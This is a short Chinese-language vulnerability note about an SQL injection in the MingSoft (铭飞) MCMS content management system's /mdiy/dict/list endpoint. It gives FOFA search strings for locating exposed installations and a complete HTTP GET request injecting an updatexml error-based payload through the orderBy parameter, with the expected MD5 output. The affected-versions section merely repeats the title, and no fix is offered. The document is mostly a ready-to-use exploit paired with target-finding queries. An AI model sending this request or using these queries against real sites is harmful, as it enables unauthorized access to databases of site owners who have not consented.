铭飞CMS dict-list存在SQL注入漏洞
一、漏洞简介
铭飞CMS是一款功能强大的内容管理系统。它提供了可靠的网站建设和内容发布解决方案,帮助用户轻松创建、编辑和管理网页内容。铭飞CMS具有直观的用户界面和丰富的功能,包括模板管理、文章发布、多媒体支持、用户权限控制等。它支持多平台部署,并且具有良好的扩展性和定制性,可以满足各种不同规模和需求的网站构建。铭飞CMS还提供了安全性和稳定性,保证网站数据的可靠性和隐私保护。铭飞CMS dict-list存在SQL注入漏洞。
二、影响版本
- 铭飞CMS dict-list存在SQL注入漏洞
三、资产测绘
- fofa
(body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js") - 特征
四、漏洞复现
GET /mdiy/dict/list?dict=c&dictType=%E6%96%87%E7%AB%A0%E5%B1%9E%E6%80%A7&orderBy=0%20or%20updatexml(1,concat(0x7e,(SELECT%20md5(1)),0x7e),1) HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
c4ca4238a0b923820dcc509a6f75849